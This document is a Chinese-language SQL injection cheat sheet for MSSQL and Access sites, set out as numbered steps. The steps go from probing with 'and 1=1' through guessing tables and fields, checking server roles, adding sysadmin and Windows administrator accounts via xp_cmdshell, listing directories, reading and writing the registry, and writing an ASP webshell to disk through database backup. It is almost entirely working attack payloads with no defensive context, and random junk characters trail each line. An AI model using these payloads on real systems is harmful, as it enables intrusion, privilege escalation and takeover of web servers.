1.判断是否有注入;and 1=1 ;and 1=2 >i-"<jG
2.初步判断是否是mssql ;and user>0 :p6M=
/vb`H>P
3.注入参数是字符'and [查询条件] and ''=' -s'-eQF J
mlS$>O_aX
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ?b5^
!$>R j
5.判断数据库系统 Nl(Foya%)
VOh4#%Vj
;and (select count(*) from sysobjects)>0 mssql @$K"o7+]
F1Bq$*'N$w
;and (select count(*) from msysobjects)>0 access y L~W.H
-1@<=jX3_
$
o#V#
b\+`e b8_
6.猜数据库 ;and (select Count(*) from [数据库名])>0 [;sRV<
HiJE}V;Vq
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $7A8/#
7i1q wRv
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 FN) $0
b*Q&CL
9.(1)猜字段的ascii值(access) GNJj=1Lsd
R_S.tT!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]:/Q]n^
01(AK% e
(2)猜字段的ascii值(mssql) 63x?MY6
t5IEQ2
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 iMRwp+$
Ok\7y-w^
10.测试权限结构(mssql) njA#@fU
Nu~lsWyRI5
% +\."eC
Hg (Gl
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- TrR8?-
_/<x
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j^2j&Ta
{+Cy U!O
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- QoH6
@49S`
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- KRKCD4
d9|<@A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- .Rf_Cl
"`1bA"E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- }?v )N).kW
Z>#i**
;and 1=(select IS_MEMBER('db_owner'));-- 2Q:+_v
k~FRD?[u
_``=cc
^@NU}S):yN
11.添加mssql和系统的帐户 pIKPXqA
,UdVNA
;exec master.dbo.sp_addlogin username;-- x.R4%Z
;exec master.dbo.sp_password null,username,password;-- Y% 5eZ=z
ZO$%[ftb
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- jsi!fx2Rm
"|KP'<8%
;exec master.dbo.xp_cmdshell 'net user username password w_u\sSQ`!
qK&d]6H
R
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3>VL}Ui}
CF5`-wj/#
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @cB$iP=Z4
~z;FP$U
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- O463I.XAP
-v|qZ'
zjoq6
e6RPIg
12.(1)遍历目录 C8i^P}y
*<ewS8f*6
;create table dirs(paths varchar(100), id int) *$ %a:q1U
UByv?KZi
;insert dirs exec master.dbo.xp_dirtree 'c:\' cDH^\-z
qPfQy
;and (select top 1 paths from dirs)>0 lQkQ9##*
2x0<&Xy#P
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) hODWB&b
'Ne@e)s9
1c{DY
WU=59gB+jL
(2)遍历目录 mvT(.R ..s
001FmiV
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- l8#EM1g-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ]f9Cx\d:k
`$aZ0+
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 WbqWG^W
Czu\RXJR
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 8StgsM
O#S.n#{
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 P1' al
Otm0(+YB7
-Wi` G
p|D/;Mk
13.mssql中的存储过程 9|CN8x-
LOV)3{m
xp_regenumvalues 注册表根键, 子键 H\tUpan6fy
Jz
*;q~
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 \7'{g@C(
?"g2v-jTK
xp_regread 根键,子键,键值名 JbQ) sp
6 3,H{
;exec xp_regread I,@6J(9
>>fH{/l
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 .gOL1`b*
hv_XP,1K
xp_regwrite 根键,子键, 值名, 值类型, 值 OMg<V
+@iA;2&
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]^K4i)\
>%8KK|V{
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 )+t0:GwP`:
H-f X(9
xp_regdeletevalue 根键,子键,值名 'qX|jtdM
Is?La
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9ahWIO%
[!]2djc
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 L"*/:$EJL.
m:o<X K[>
;)^`3`
`
3K)GA
14.mssql的backup创建webshell EV@X*| w
V~;1IQd{
use model ve2u=eQ1
bTs?!~q
create table cmd(str image); yT9@!]^L
%
0+j?>#X
insert into cmd(str) values (''); i5?q,_
R>mmoG}MQ[
backup database model to disk='c:\l.asp'; ]R9HyCl&a6
qfRH5)k
5 -RsnF
+<3XJ7D
15.mssql内置函数 j@uOOhy
e@*
EzvO
;and (select @@version)>0 获得Windows的版本号 ?\s+EE&-
K':;%~I
;and user_name()='dbo' 判断当前系统的连接用户是不是sa o@i#|kx,
6 EC*
;and (select user_name())>0 爆当前系统的连接用户 l(tOe
;8{4!S&b
;and (select db_name())>0 得到当前连接的数据库 C-6F]2:
1rF]yi:X
!*bMa8]*
Zu("#cA.H
16.简洁的webshell xx9 g''Q
$#pPZ
use model @Y<bwv
;{tj2m,
create table cmd(str image); x%!s:LVX
UH-*(MfB
insert into cmd(str) values (''); @{tz:f
F Yzi~L
backup database model to disk='g:\wwwtest\l.asp';